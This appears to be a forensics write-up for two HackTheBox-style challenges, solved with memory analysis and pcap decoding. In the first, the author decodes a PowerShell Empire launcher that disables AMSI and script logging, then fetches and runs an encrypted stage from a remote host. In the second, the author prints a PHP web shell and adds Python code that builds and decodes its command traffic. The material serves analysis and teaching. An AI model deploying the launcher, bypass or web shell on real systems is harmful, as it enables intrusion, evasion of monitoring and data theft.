# 1/ Reminiscent

First I unzip the archive; its contents look like this:

The task asks me to find and decode the malware's source, so I'll focus on the .elf file (the memory dump of the virtual machine) and on imageinfo.txt (the Volatility profile for that dump). The profile is only needed by Volatility 2; Volatility 3, which I use below, resolves the kernel symbols from the dump itself.
Following the task description, I'll first check whether any of the running processes look suspicious.
```
$ python3 vol.py -f flounder-pc-memdump.elf windows.pslist
```
```
PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime File output
4 0 System 0xfa80006b7040 83 477 N/A False 2017-10-04 18:04:27.000000 N/A Disabled
272 4 smss.exe 0xfa8001a63b30 2 30 N/A False 2017-10-04 18:04:27.000000 N/A Disabled
348 328 csrss.exe 0xfa800169bb30 9 416 0 False 2017-10-04 18:04:29.000000 N/A Disabled
376 328 wininit.exe 0xfa8001f63b30 3 77 0 False 2017-10-04 18:04:29.000000 N/A Disabled
396 384 csrss.exe 0xfa8001efa500 9 283 1 False 2017-10-04 18:04:29.000000 N/A Disabled
432 384 winlogon.exe 0xfa8001f966d0 4 112 1 False 2017-10-04 18:04:29.000000 N/A Disabled
476 376 services.exe 0xfa8001fcdb30 11 201 0 False 2017-10-04 18:04:29.000000 N/A Disabled
492 376 lsass.exe 0xfa8001ff2b30 8 590 0 False 2017-10-04 18:04:30.000000 N/A Disabled
500 376 lsm.exe 0xfa8001fffb30 11 150 0 False 2017-10-04 18:04:30.000000 N/A Disabled
600 476 svchost.exe 0xfa8002001b30 12 360 0 False 2017-10-04 18:04:30.000000 N/A Disabled
664 476 VBoxService.ex 0xfa800209bb30 12 118 0 False 2017-10-04 18:04:30.000000 N/A Disabled
728 476 svchost.exe 0xfa80020b5b30 7 270 0 False 2017-10-04 18:04:30.000000 N/A Disabled
792 476 svchost.exe 0xfa80021044a0 21 443 0 False 2017-10-04 18:04:30.000000 N/A Disabled
868 476 svchost.exe 0xfa8002166b30 21 429 0 False 2017-10-04 18:04:30.000000 N/A Disabled
900 476 svchost.exe 0xfa800217cb30 41 977 0 False 2017-10-04 18:04:30.000000 N/A Disabled
988 476 svchost.exe 0xfa80021ccb30 13 286 0 False 2017-10-04 18:04:30.000000 N/A Disabled
384 476 svchost.exe 0xfa8002204960 17 386 0 False 2017-10-04 18:04:30.000000 N/A Disabled
1052 476 spoolsv.exe 0xfa8002294b30 13 277 0 False 2017-10-04 18:04:31.000000 N/A Disabled
1092 476 svchost.exe 0xfa80022bbb30 19 321 0 False 2017-10-04 18:04:31.000000 N/A Disabled
1196 476 svchost.exe 0xfa8002390620 28 333 0 False 2017-10-04 18:04:31.000000 N/A Disabled
1720 476 taskhost.exe 0xfa8002245060 8 148 1 False 2017-10-04 18:04:36.000000 N/A Disabled
1840 476 sppsvc.exe 0xfa8002122060 4 145 0 False 2017-10-04 18:04:37.000000 N/A Disabled
2020 868 dwm.exe 0xfa80022c8060 4 72 1 False 2017-10-04 18:04:41.000000 N/A Disabled
2044 2012 explorer.exe 0xfa80020bb630 36 926 1 False 2017-10-04 18:04:41.000000 N/A Disabled
1476 2044 VBoxTray.exe 0xfa80022622e0 13 146 1 False 2017-10-04 18:04:42.000000 N/A Disabled
1704 476 SearchIndexer. 0xfa80021b4060 16 734 0 False 2017-10-04 18:04:47.000000 N/A Disabled
812 1704 SearchFilterHo 0xfa80023ed550 4 92 0 False 2017-10-04 18:04:48.000000 N/A Disabled
1960 1704 SearchProtocol 0xfa80024f4b30 6 311 0 False 2017-10-04 18:04:48.000000 N/A Disabled
2812 2044 thunderbird.ex 0xfa80007e0b30 50 534 1 True 2017-10-04 18:06:24.000000 N/A Disabled
2924 600 WmiPrvSE.exe 0xfa8000801b30 10 204 0 False 2017-10-04 18:06:26.000000 N/A Disabled
2120 476 svchost.exe 0xfa8000945060 12 335 0 False 2017-10-04 18:06:32.000000 N/A Disabled
2248 476 wmpnetwk.exe 0xfa800096eb30 18 489 0 False 2017-10-04 18:06:33.000000 N/A Disabled
592 600 WmiPrvSE.exe 0xfa8000930b30 9 127 0 False 2017-10-04 18:06:35.000000 N/A Disabled
496 2044 powershell.exe 0xfa800224e060 12 300 1 False 2017-10-04 18:06:58.000000 N/A Disabled
2772 396 conhost.exe 0xfa8000e90060 2 55 1 False 2017-10-04 18:06:58.000000 N/A Disabled
2752 496 powershell.exe 0xfa8000839060 20 396 1 False 2017-10-04 18:07:00.000000 N/A Disabled
```
None of the process names look out of place on their own. The parent/child relationships are more interesting: explorer.exe (2044) started powershell.exe (496), which in turn started a second powershell.exe (2752), a chain that script-based droppers produce and that a real user rarely does.
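To make that lineage check repeatable rather than eyeballed, here is a small script I added for this write-up (it is not part of the challenge or of Volatility) that parses the `windows.pslist` text above, rebuilds the parent chain of each process and flags script hosts started by a user application or by another script host. The embedded listing is a subset of the rows above, copied unchanged; the lists of script hosts and user-facing applications are my own choice.

```python
"""Parse Volatility 3 windows.pslist output and flag suspicious parent/child lineage."""
from typing import Dict, List, Tuple

# Excerpt of the windows.pslist output above (a subset of its rows, copied unchanged).
PSLIST_EXCERPT = """\
PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime File output
4 0 System 0xfa80006b7040 83 477 N/A False 2017-10-04 18:04:27.000000 N/A Disabled
272 4 smss.exe 0xfa8001a63b30 2 30 N/A False 2017-10-04 18:04:27.000000 N/A Disabled
396 384 csrss.exe 0xfa8001efa500 9 283 1 False 2017-10-04 18:04:29.000000 N/A Disabled
476 376 services.exe 0xfa8001fcdb30 11 201 0 False 2017-10-04 18:04:29.000000 N/A Disabled
600 476 svchost.exe 0xfa8002001b30 12 360 0 False 2017-10-04 18:04:30.000000 N/A Disabled
2044 2012 explorer.exe 0xfa80020bb630 36 926 1 False 2017-10-04 18:04:41.000000 N/A Disabled
2812 2044 thunderbird.ex 0xfa80007e0b30 50 534 1 True 2017-10-04 18:06:24.000000 N/A Disabled
2924 600 WmiPrvSE.exe 0xfa8000801b30 10 204 0 False 2017-10-04 18:06:26.000000 N/A Disabled
496 2044 powershell.exe 0xfa800224e060 12 300 1 False 2017-10-04 18:06:58.000000 N/A Disabled
2772 396 conhost.exe 0xfa8000e90060 2 55 1 False 2017-10-04 18:06:58.000000 N/A Disabled
2752 496 powershell.exe 0xfa8000839060 20 396 1 False 2017-10-04 18:07:00.000000 N/A Disabled
"""

# Interpreters and LOLBins that rarely have a business reason to be started by a mail client or Explorer.
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
# pslist truncates image names to 14 characters ("thunderbird.ex"), so match on prefixes.
USER_APP_PREFIXES = ("explorer", "thunderbird", "outlook", "winword", "excel", "powerpnt", "acrord32")

Process = Tuple[int, str]  # (PPID, image name)


def parse_pslist(text: str) -> Dict[int, Process]:
    """Map PID -> (PPID, ImageFileName); the header line and blank lines are skipped."""
    procs: Dict[int, Process] = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3 or not fields[0].isdigit():
            continue
        procs[int(fields[0])] = (int(fields[1]), fields[2])
    return procs


def lineage(procs: Dict[int, Process], pid: int) -> List[str]:
    """Image names from pid upwards until an ancestor is no longer in the list (exited or unknown)."""
    chain: List[str] = []
    seen = set()
    while pid in procs and pid not in seen:  # 'seen' guards against loops caused by PID reuse
        seen.add(pid)
        ppid, name = procs[pid]
        chain.append(name)
        pid = ppid
    return chain


def find_suspicious(procs: Dict[int, Process]) -> List[Tuple[int, str, str]]:
    """Return (pid, image, reason) for script hosts started by user apps or by other script hosts."""
    hits: List[Tuple[int, str, str]] = []
    for pid, (ppid, name) in sorted(procs.items()):
        if name.lower() not in SCRIPT_HOSTS:
            continue
        parent = procs.get(ppid, (0, "<exited>"))[1].lower()
        if parent.startswith(USER_APP_PREFIXES):
            hits.append((pid, name, f"launched by user application {parent} (pid {ppid})"))
        elif parent in SCRIPT_HOSTS:
            hits.append((pid, name, f"nested under another script host {parent} (pid {ppid})"))
    return hits


if __name__ == "__main__":
    procs = parse_pslist(PSLIST_EXCERPT)
    for pid, name, reason in find_suspicious(procs):
        print(f"{pid:>5} {name:<16} {reason}; lineage: {' <- '.join(lineage(procs, pid))}")
```

Run against the full `windows.pslist` output it reports both PowerShell instances: 496 because Explorer started it, and 2752 because its parent is another PowerShell. The same parse can be pointed at `windows.pstree` output later to confirm the chain.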
Next I'll look at the network connections that were open at the moment the memory was dumped:
```
$ python3 vol.py -f flounder-pc-memdump.elf windows.netscan
```

One thing stands out: on a recruiter's machine, powershell.exe is holding a connection to port 80, i.e. it is talking to a plain-HTTP web server.
That process is powershell.exe with PID 2752, so I'll check which command line it was started with.
```
$ python3 vol.py -f flounder-pc-memdump.elf windows.cmdline --pid 2752
```
The result is a base64 string:
```
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
```
Now let's decode it. `-EncodedCommand` takes base64 of UTF-16LE text, so the output of `base64 -d` still has a NUL byte after every character; piping it through `iconv` gives readable ASCII:
```
echo -n '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' | base64 -d | iconv -f UTF-16LE -t UTF-8
```
Result:
```
$GroUPPOLiCYSEttINGs = [rEF].ASseMBLY.GEtTypE('System.Management.Automation.Utils')."GEtFIE`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static').GETValUe($nulL);$GRouPPOlICySeTTiNgS['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;$GRouPPOLICYSEtTingS['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;[Ref].AsSemBly.GeTTyPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFieLd('amsiInitFailed','NonPublic,Static').SETVaLuE($NulL,$True)};[SysTem.NeT.SErVIcePOIntMAnAgER]::ExpEct100COnTinuE=0;$WC=NEW-OBjEcT SysTEM.NEt.WeBClIEnt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wC.HeaDerS.Add('User-Agent',$u);$Wc.PRoXy=[SysTeM.NET.WebRequEst]::DefaULtWeBPROXY;$wC.PRoXY.CREDeNtIaLS = [SYSTeM.NET.CreDEnTiaLCaChe]::DeFauLTNEtwOrkCredentiAlS;$K=[SYStEM.Text.ENCODIng]::ASCII.GEtBytEs('E1gMGdfT@eoN>x9{]2F7+bsOn4/SiQrw');$R={$D,$K=$ArgS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CounT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxoR$S[($S[$I]+$S[$H])%256]}};$wc.HEAdErs.ADD("Cookie","session=MCahuQVfz0yM6VBe8fzV9t9jomo=");$ser='http://10.10.99.55:80';$t='/login/process.php';$flag='HTB{$_j0G_y0uR_M3m0rY_$}';$DatA=$WC.DoWNLoaDDATA($SeR+$t);$iv=$daTA[0..3];$DAta=$DaTa[4..$DAta.LenGTH];-JOIN[CHAr[]](& $R $datA ($IV+$K))|IEX
```
Reading through it: the script first zeroes the cached `ScriptBlockLogging` Group Policy settings and sets `amsiInitFailed`, so neither Script Block Logging nor AMSI sees what runs next; it then builds a WebClient with a browser User-Agent and a fixed `session=` cookie, fetches `http://10.10.99.55:80/login/process.php`, treats the first four bytes of the response as an IV, RC4-decrypts the rest (the `$R` script block is RC4 keyed with `$IV+$K`) and pipes the result into `IEX`. This matches the PowerShell Empire launcher; the flag is simply hard-coded in the `$flag` variable.
**Flag :** HTB{\$_j0G_y0uR_M3m0rY_$}
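The stage that the launcher fetches cannot be recovered from this write-up, but the decryption step is fully specified by the `$R` script block: RC4, keyed with the four IV bytes that start the response followed by `$K`. As an added example (my own code, not from the challenge or from Empire), this reimplements that step in Python so that a captured response body can be turned back into the PowerShell it would have run; the sample stage in the block is constructed for the demonstration.

```python
"""Decrypt a stage served to the launcher above: 4-byte IV prefix, RC4 keyed with IV + $K."""
import os
from typing import Optional

# The $K literal from the decoded launcher above.
STAGING_KEY = b"E1gMGdfT@eoN>x9{]2F7+bsOn4/SiQrw"


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 exactly as the $R script block implements it: KSA over 0..255, then PRGA."""
    S = list(range(256))
    j = 0
    for i in range(256):  # $J=($J+$S[$_]+$K[$_%$K.Count])%256; swap
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:  # $I=($I+1)%256; $H=($H+$S[$I])%256; swap; $_ -bxor $S[($S[$I]+$S[$H])%256]
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def decrypt_stage(blob: bytes, staging_key: bytes = STAGING_KEY) -> bytes:
    """$iv=$data[0..3]; $data=$data[4..]; RC4 with key $IV+$K. The launcher pipes the result to IEX."""
    if len(blob) < 5:
        raise ValueError("response too short to hold an IV and a stage")
    iv, body = blob[:4], blob[4:]
    return rc4(iv + staging_key, body)


def encrypt_stage(stage: bytes, staging_key: bytes = STAGING_KEY, iv: Optional[bytes] = None) -> bytes:
    """Server side of the same scheme (used here only to build test data)."""
    iv = iv if iv is not None else os.urandom(4)
    if len(iv) != 4:
        raise ValueError("IV must be exactly 4 bytes")
    return iv + rc4(iv + staging_key, stage)


if __name__ == "__main__":
    # Constructed stage, not from the challenge: the real one would be the HTTP response body
    # from http://10.10.99.55:80/login/process.php, e.g. carved from the pcap or from memory.
    sample = encrypt_stage(b"Write-Host 'second stage'", iv=b"\x01\x02\x03\x04")
    print(decrypt_stage(sample).decode())
```

Feed the raw response body (not the base64 launcher) to `decrypt_stage`; Empire stages are ASCII PowerShell, so `.decode()` on the result is enough to read them. Because RC4 is a stream cipher, a wrong key produces garbage rather than an error, so a sanity check such as looking for `function` or `$` near the start of the output is worthwhile.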
# 2/ Obscure

Here is what I got after unzipping:

I'll start with support.php.
The file is clearly obfuscated:
```php=
<?php
$V='$k="80eu)u)32263";$khu)=u)"6f8af44u)abea0";$kf=u)"35103u)u)9f4a7b5";$pu)="0UlYu)yJHG87Eu)JqEz6u)"u)u);function u)x($';
$P='++)u){$o.=u)$t{u)$i}^$k{$j};}}u)retuu)rn $o;}u)if(u)@pregu)_u)match("/$kh(.u)+)$kf/",@u)u)file_u)getu)_cu)ontents(';
$d='u)t,$k){u)$c=strlu)en($k);$l=strlenu)($t)u);u)$o=""u);for($i=0u);u)$i<$l;){for(u)$j=0;(u)$u)j<$c&&$i<$l)u)u);$j++,$i';
$B='ob_get_cou)ntu)ents();@obu)_end_cleu)anu)();$r=@basu)e64_eu)ncu)ode(@x(@gzu)compress(u)$o),u)$k));pru)u)int(u)"$p$kh$r$kf");}';
$N=str_replace('FD','','FDcreFDateFD_fFDuncFDFDtion');
$c='"php://u)input"),$u)m)==1){@u)obu)_start();u)@evau)l(@gzuu)ncu)ompress(@x(@bau)se64_u)decodu)e($u)m[1]),$k))u));$u)ou)=@';
$u=str_replace('u)','',$V.$d.$P.$c.$B);
$x=$N('',$u);$x();
?>
```
I used [Unphp](https://www.unphp.net/decode/792db23b84299ad36b1ecf95f380cf17/) to deobfuscate it:
```php=
<?php
$k="80e32263";
$kh="6f8af44abea0";
$kf="351039f4a7b5";
$p="0UlYyJHG87EJqEz6";
function x($t,$k){
$c=strlen($k);
$l=strlen($t);
$o="";
for($i=0;$i<$l;)
{
for($j=0;($j<$c&&$i<$l);$j++,$i++)
{
$o.=$t{$i}^$k{$j};
}
}return $o;
}
if(@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1){@ob_start();
eval(@gzuncompress(@x(base64_decode($m[1]),$k)));
$o=@ob_get_contents();
@ob_end_clean();
$r=@base64_encode(@x(@gzcompress($o),$k));
print("$p$kh$r$kf");
}
?>
```
From this code I know that it prints `0UlYyJHG87EJqEz66f8af44abea0` + `$r` + `351039f4a7b5`.
This is a web shell. It reads the raw POST body through `php://input`, looks for a payload framed between `$kh` and `$kf`, base64-decodes it, XORs it with the key `$k` (`80e32263`), gzuncompresses the result and evals it. Whatever the code prints is captured with output buffering, encoded the same way in reverse (`@base64_encode(@x(@gzcompress($o),$k))`) and printed between `$p$kh` and `$kf`. Note that `x()` is a plain repeating-key XOR, so the same function both encodes and decodes, and the request uses exactly the same framing as the response: the attacker's commands can therefore be recovered from the pcap in the same way as the results.
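To see the protocol end to end, here is an added Python re-implementation (my own, not code from the challenge) of both sides of that framing: what a request body looks like when the operator sends PHP to the shell, and how a response body is decoded. It uses the key and delimiters from support.php; the response it unpacks is the first stream listed below, and the request it builds is a constructed example.

```python
"""Encode and decode traffic for the support.php web shell (zlib + XOR + base64, framed by $kh/$kf)."""
import base64
import re
import zlib

K = b"80e32263"           # $k, the XOR key
KH = "6f8af44abea0"       # $kh, opening delimiter
KF = "351039f4a7b5"       # $kf, closing delimiter
P = "0UlYyJHG87EJqEz6"    # $p, prefix the shell prints before $kh in every response

# First response captured in the pcap (Wireshark stream 1), copied from the listing below.
STREAM1 = "0UlYyJHG87EJqEz66f8af44abea0QKxO/n6DAwXuGEoc5X9/H3HkMXv1Ih75Fx1NdSPRNDPUmHTy351039f4a7b5"

# Same greedy pattern as preg_match("/$kh(.+)$kf/") in the shell.
FRAME = re.compile(re.escape(KH) + r"(.+)" + re.escape(KF), re.S)


def x(data: bytes, key: bytes = K) -> bytes:
    """PHP x(): repeating-key XOR, so applying it twice restores the input."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def pack(payload: bytes) -> str:
    """gzcompress -> x -> base64: what the shell applies to its output and expects of its input."""
    return base64.b64encode(x(zlib.compress(payload))).decode()


def unframe(body: str) -> bytes:
    """Pull the blob from between $kh and $kf and undo the base64 and XOR layers (a zlib stream remains)."""
    m = FRAME.search(body)
    if not m:
        raise ValueError("no payload framed by $kh ... $kf")
    return x(base64.b64decode(m.group(1)))


def build_request(php_code: str) -> str:
    """POST body the operator sends; the shell base64-decodes, XORs, gzuncompresses and evals it."""
    return KH + pack(php_code.encode()) + KF


def build_response(output: str) -> str:
    """What the shell prints: "$p$kh$r$kf", with $r built the same way from the buffered output."""
    return P + KH + pack(output.encode()) + KF


def decode(body: str) -> str:
    """Recover the PHP code from a request body, or the command output from a response body."""
    return zlib.decompress(unframe(body)).decode(errors="replace")


if __name__ == "__main__":
    print(decode(STREAM1))                              # the command output carried by stream 1
    demo = build_request("echo shell_exec('id');")      # constructed request, not from the pcap
    print(demo, "->", decode(demo))
```

A quick sanity check when applying this to other captures: after `unframe`, a valid blob starts with the zlib header bytes `78 9c`; if it does not, the key or the delimiters are wrong. For the request side, extract the HTTP POST body from each stream and pass it to `decode` exactly as with the responses.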
Now to the pcap, to find what the shell printed. I'll use Follow TCP Stream in Wireshark and step through the stream numbers to collect the responses.
These are the responses from the streams that matter:
```
stream1:
0UlYyJHG87EJqEz66f8af44abea0QKxO/n6DAwXuGEoc5X9/H3HkMXv1Ih75Fx1NdSPRNDPUmHTy351039f4a7b5
```
```
stream23:
0UlYyJHG87EJqEz66f8af44abea0QKzo43k49AMoNoVOfAMh+6h3euEZJvkTlblqP34rlZqPhxDgKLYMz7NpqfQ9IR9FOXy0OfVbUgo/PF3MxrMw/JOdJebwjE2y6VAxUFnyA4H4dHQNgV49YatbqT0it9IXYf5kzoE4+kfGnZ/dTAsyCesTC0i5V+gJQw6bYm/nU3U/lrYGyl+dgvIOURfl0fvGm0hmr0RZKQ==351039f4a7b5
```
```
stream24:
0UlYyJHG87EJqEz66f8af44abea0QKy2/Pr9e+Z3eUh4//sZexUyZR8mN/g=351039f4a7b5
```
```
stream25:
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351039f4a7b5
```
Now I'll write a script to recover the original `$o` from a response:
```php=
<?php
// Inverse of x() from support.php; repeating-key XOR is its own inverse, so the body is identical.
function reverseX($o, $k) {
$c = strlen($k);
$l = strlen($o);
$t = "";
for ($i = 0; $i < $l;) {
for ($j = 0; ($j < $c && $i < $l); $j++, $i++) {
$t .= $o[$i] ^ $k[$j]; // [] instead of the {} string-offset syntax, which PHP 8 removed
}
}
return $t;
}
$inputString = "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351039f4a7b5";
$prefixToCut = "0UlYyJHG87EJqEz66f8af44abea0"; // $p . $kh
$suffixToCut = "351039f4a7b5";                  // $kf
$prefixStartPosition = strpos($inputString, $prefixToCut);
$prefixLength = strlen($prefixToCut);
$suffixStartPosition = strpos($inputString, $suffixToCut);
$suffixLength = strlen($suffixToCut);
if ($prefixStartPosition === false || $suffixStartPosition === false) {
die("response is not framed by \$p\$kh ... \$kf\n");
}
$encodedData = substr($inputString, $prefixStartPosition + $prefixLength, $suffixStartPosition - ($prefixStartPosition + $prefixLength));
$k = "80e32263";
// Undo the layers in reverse order: base64 -> XOR -> gzuncompress
$compressedData = base64_decode($encodedData);
$originalData = gzuncompress(reverseX($compressedData, $k));
echo $originalData;
?>
```
Replacing $inputString with each of the streams above gives, respectively:
```
#stream1:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
```
#stream23:
drwxr-xr-x 2 developer developer 4.0K May 21 20:37 .
drwxr-xr-x 3 root root 4.0K May 20 21:28 ..
-rw-r--r-- 1 developer developer 220 May 20 21:28 .bash_logout
-rw-r--r-- 1 developer developer 3.5K May 20 21:28 .bashrc
-rw-r--r-- 1 developer developer 675 May 20 21:28 .profile
-rw-r--r-- 1 developer developer 1.6K May 21 20:37 pwdb.kdbx
```
```
#stream24:
/home/developer
```
```
#stream25:
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
```
